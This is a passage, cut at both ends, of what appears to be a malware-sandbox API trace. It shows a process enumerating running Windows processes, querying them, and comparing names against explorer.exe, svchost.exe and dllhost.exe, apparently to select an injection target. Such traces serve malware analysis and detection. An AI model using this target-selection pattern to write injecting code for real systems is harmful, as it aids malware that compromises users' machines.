szExeFile="smss.exe")) returned 1 [0233.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0233.528] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0233.528] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0233.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0233.529] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0233.530] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0233.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0233.530] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0233.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0233.531] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0233.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0233.532] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0233.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0233.532] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0233.533] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0233.534] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0233.534] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0233.535] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0233.535] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0233.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0233.536] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0233.537] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0233.537] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0233.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0233.538] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.538] CloseHandle (hObject=0xd8) returned 1 [0233.538] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0233.538] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0233.538] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0233.538] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0233.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0233.539] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0233.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0233.539] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.539] CloseHandle (hObject=0xd8) returned 1 [0233.540] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0233.540] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0233.540] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0233.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0233.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0233.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0233.541] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0233.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0233.542] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.542] CloseHandle (hObject=0xd8) returned 1 [0233.542] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0233.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0233.542] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.542] CloseHandle (hObject=0xd8) returned 1 [0233.542] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0233.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0233.543] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.543] CloseHandle (hObject=0xd8) returned 1 [0233.543] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0233.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0233.544] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.544] CloseHandle (hObject=0xd8) returned 1 [0233.544] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0233.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0233.544] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.544] CloseHandle (hObject=0xd8) returned 1 [0233.545] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0233.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0233.545] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.545] CloseHandle (hObject=0xd8) returned 1 [0233.545] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0233.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0233.546] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.546] CloseHandle (hObject=0xd8) returned 1 [0233.546] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0233.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0233.547] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.547] CloseHandle (hObject=0xd8) returned 1 [0233.547] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0233.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0233.547] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.547] CloseHandle (hObject=0xd8) returned 1 [0233.547] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0233.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0233.548] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.548] CloseHandle (hObject=0xd8) returned 1 [0233.548] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0233.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0233.549] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.549] CloseHandle (hObject=0xd8) returned 1 [0233.549] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0233.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0233.550] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.550] CloseHandle (hObject=0xd8) returned 1 [0233.550] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0233.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0233.550] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.550] CloseHandle (hObject=0xd8) returned 1 [0233.550] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0233.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0233.551] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.551] CloseHandle (hObject=0xd8) returned 1 [0233.551] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0233.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0233.552] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.552] CloseHandle (hObject=0xd8) returned 1 [0233.552] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0233.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0233.552] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.553] CloseHandle (hObject=0xd8) returned 1 [0233.553] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0233.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0233.553] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.553] CloseHandle (hObject=0xd8) returned 1 [0233.553] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0233.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0233.554] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.554] CloseHandle (hObject=0xd8) returned 1 [0233.554] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0233.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0233.555] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.555] CloseHandle (hObject=0xd8) returned 1 [0233.555] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0233.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0233.555] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.555] CloseHandle (hObject=0xd8) returned 1 [0233.555] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0233.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0233.585] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.586] CloseHandle (hObject=0xd8) returned 1 [0233.586] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0233.586] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0233.587] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0233.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0233.587] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0233.588] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0233.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0233.589] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0233.589] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.589] CloseHandle (hObject=0xd8) returned 1 [0233.589] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0233.589] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0233.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0233.590] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.590] CloseHandle (hObject=0xd8) returned 1 [0233.590] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0233.590] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0233.590] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0233.590] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0233.591] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0233.591] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.591] CloseHandle (hObject=0xd8) returned 1 [0233.591] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0233.592] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.592] CloseHandle (hObject=0xd8) returned 1 [0233.592] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0233.592] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, 